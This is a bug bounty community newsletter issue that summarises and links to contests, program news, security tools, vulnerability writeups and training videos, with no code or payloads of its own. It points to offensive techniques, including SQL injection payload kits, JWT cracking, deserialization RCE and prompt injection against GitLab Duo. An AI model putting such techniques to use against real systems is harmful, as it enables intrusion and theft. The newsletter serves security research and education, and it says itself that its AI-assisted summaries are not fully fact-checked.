Disclosed. June 1, 2025: Disclosed. Launch, DistrictCon Junkyard Contest, Evan Connelly’s HackerOne Reflections, and more.

Junkyard Contest Offers Prizes for Vulnerability Research [🔗 Tweet]
by @DistrictCon

The Junkyard contest is live on Bugcrowd, offering prizes ranging from $100 to $5,000 in various categories to engage vulnerability researchers while promoting responsible disclosure.
Read the full tweet →

Launch of Curated Bug Bounty Newsletter 'Disclosed.' [🔗 Tweet]
by @infinitelogins

This tweet announces the public launch of 'Disclosed.', a newsletter tailored for the bug bounty community, focusing on programs, events, and educational resources.
Read the full tweet →

Launch of “Disclosed. Online”. [🔗 Tweet]
by @infinitelogins

This tweet introduces a new automation project designed to aggregate bug bounty profiles.
Read the full tweet →

What I Learned From My First 100 HackerOne Reports [🔗 Blog]
by Evan Connelly

Evan Connelly reflects on lessons learned from his first 100 HackerOne reports, offering insights into hacker mindset, report quality, and evolving tooling preferences.
Read the full blog →

Have something you want to Spotlight? Tell me.

Meta Invites Researchers for Exclusive Quest Device Bug Bounty [🔗 Tweet]
by @metabugbounty

Meta is launching an exclusive invite-only bug bounty program for Quest devices, focusing on RCE and EOP vulnerabilities, seeking experienced researchers with added incentives to participate.
Read the full tweet →

Recon Village at DEF CON 33 CFP Deadline is June 15 [🔗 Tweet]
by @ReconVillage

An invitation to submit talks for the Recon Village at DEF CON 33, with a submission deadline of June 15.
Read the full tweet →

UK HackerOne Club Hacking Meetup Scheduled for June! [🔗 Tweet]
by @njcve_

An invitation to participate in a hackathon event in London, encouraging attendees to spread the word.
Read the full tweet →

Zoom Reports Major Bug Bounty Program Success and Improvements [🔗 Tweet]
by @Hacker0x01

Zoom outlines significant improvements in its bug bounty program, featuring doubled participation, key vulnerability fixes, and reduced remediation times, showcasing the program’s effectiveness.
Read the full tweet →

Did I miss an important update? Tell me.

SQLi Pentest Toolkit. Unleash your inner hacker — the SQLi… [📓 Blog]
by adce626

This post introduces the SQLi Pentest Toolkit, a web resource for penetration testers focused on SQL Injection vulnerabilities. It covers essential features like a user-friendly UI, diverse SQLi payloads, time-based testing commands, and a section for Google Dorks. The toolkit integrates LOXS for time-based SQLi detection and includes educational videos to enhance learning.
Read more →

New Resource for Caido Plugins Streamlines Setup [🔗 Tool]
by @amrelsagaei

The launch of CaidoPlugins.com offers a centralized resource for Caido-related plugins, including listings and installation guides to save users time.
Read the full tweet →

Open-Source Web App for Bug Bounty Tracking [🔗 Tool]
by @sirmatrixpage

A new open-source web app for bug bounty hunters allows users to track vulnerabilities, save tips, and receive updates through RSS feeds.
Read the full tweet →

BountyOS - Bug Bounty Linux OS [📓 Tool]
by Sirat Sami (analyz3r)

BountyOS is a Debian 12-based Linux distribution specifically crafted for bug bounty professionals and web app security researchers. It offers over 75 essential tools in categories like reconnaissance and testing, easily accessible in live mode. Regular updates and exclusive tools not found elsewhere aim to create a streamlined environment for security researchers.
Read more →

Active Scan++ Enhances OS Command Injection Checks [🔗 Tool]
by @d4d89704243

Active Scan++ has introduced new checks for OS command injection based on recent research, and it is now available through the BApp Store.
Read the full tweet →

Have a favorite tool? Tell me.

Remote Prompt Injection in GitLab Duo Leads to Source Code Theft
📝 Writeup by Omer Mayraz

A serious remote prompt injection vulnerability in GitLab Duo has been identified, potentially leading to source code theft, highlighting a critical security concern.
Read more →

How I was able to Delete Any User Post On Tumbler
📝 Writeup by 0xshehab

This blog post details a discovered vulnerability on Tumblr that allows an attacker to delete any user's post without requiring user interaction. The exploit leverages insecure HTTP method handling and the misuse of the embed_url feature for audio posts.
Read more →

Did I miss an important update? Tell me.

My Bug Bounty Automation Update! [🎥 Video]
by G0LDEN_infosec

This video provides a brief overview of g0lden’s current bug bounty automation setup, highlighting recent changes.
Watch video →

Balancing Bug Bounty Freedom with Hacking Time (Ep. 124) [🎥 Video]
by Critical Thinking - Bug Bounty Podcast

In Episode 124, Justin and Joseph discuss news from the community, offering insights on managing hacking time effectively.
Watch video →

Vibe Coding in Cursor for Cyber Security [🔗 Video]
by @InsiderPhD

This video introduces 'vibe coding' with AI to create custom recon tools but lacks depth in actionable content.
Watch the video →

Advanced GitHub Recon & .git Exposer [🔗 Video]
by @coffinxp7

A video featuring live reconnaissance on a NASA subdomain uncovers sensitive database credentials, demonstrating mass .git directory hunting techniques.
Watch the video →

This Sneaky Malware Uses Cloudflare to Steal Your Password [🔗 Video]
by Ben Sadeghipour (Nahamsec)

This tweet highlights how a simple right-click file deletion can trigger malware deployment, showcasing a technique by @I_Am_Jakoby.
Watch the video →

RCE via deserialization with a class allowlist bypass and DNS exfiltration with Arthur Aires [🔗 Video]
by Bug Bounty Reports Explained

This video demonstrates real-world deserialization RCE exploits, focusing on techniques for bypassing a class allowlist and data exfiltration via DNS.
Watch the video →

Did I miss something? Tell me.

Recon series #5: A hacker’s guide to Google dorking – YesWeHack [📓 Blog]
by YesWeHack

This comprehensive guide to Google dorking illustrates its importance for bug bounty hunters, detailing key search operators that aid effective reconnaissance. It includes practical illustrations for uncovering subdomains, hidden files, and login portals, emphasizing passive reconnaissance methods.
Read more →

Cracking JWTs: A Bug Bounty Hunting Guide — Part 2 [📓 Blog]
by Aditya Bhatt

This article explores exploitation techniques related to JSON Web Tokens (JWTs), focusing on weak signing keys to bypass authentication controls. It includes a hands-on lab walkthrough, using tools like Burp Suite and Hashcat to crack JWTs. The post emphasizes the significance of strong cryptographic practices in security assessments.
Read more →

Essential API Hacking Tips for Bug Bounty Success [🔗 Tweet]
by @intigriti

This tweet shares twelve valuable tips for hacking APIs that bug bounty hunters can apply in their research.
Read the full tweet →

Did I miss something? Tell me.

Real-Time RCE via Less Secure Staging Endpoint [🔗 Tweet]
by Matt Greer (VailSec)

The researcher discovered an employee subdomain with a PDF upload feature, leading to unauthenticated remote code execution due to WAF misconfigurations in both staging and production.
Read the full tweet →

Top 5 Insecure Coding Patterns to Identify Bugs [🔗 Thread]
by André Baptista (0xacb)

This tweet outlines five insecure coding patterns that can help researchers spot overlooked bugs during assessments.
Read the full thread →

New XSS Vector Found Exclusively in Safari [🔗 Tweet]
by Gareth Heyes

This tweet highlights a new XSS vector found in Safari, challenging others to identify it without accessing the shared link.
Read the full tweet →

Understanding Prompt Injection and Its Security Implications [🔗 Tweet]
by rez0

The tweet highlights that many prompt injection issues originate from fundamental application security flaws, stressing the need for new solutions as AI evolves.
Read the full tweet →

Broadening Recon Techniques Beyond Enumeration and Fuzzing [🔗 Tweet]
by RogueSMG

This tweet emphasizes advanced reconnaissance techniques, such as analyzing JavaScript for hidden parameters and reverse-engineering mobile apps.
Read the full tweet →

Did I miss something? Tell me.

Because Disclosure Matters: This newsletter was produced with the assistance of AI. While I strive for accuracy and quality, not all content has been independently vetted or fact-checked. Please allow for a reasonable margin of error. The views expressed are my own and do not reflect those of my employer.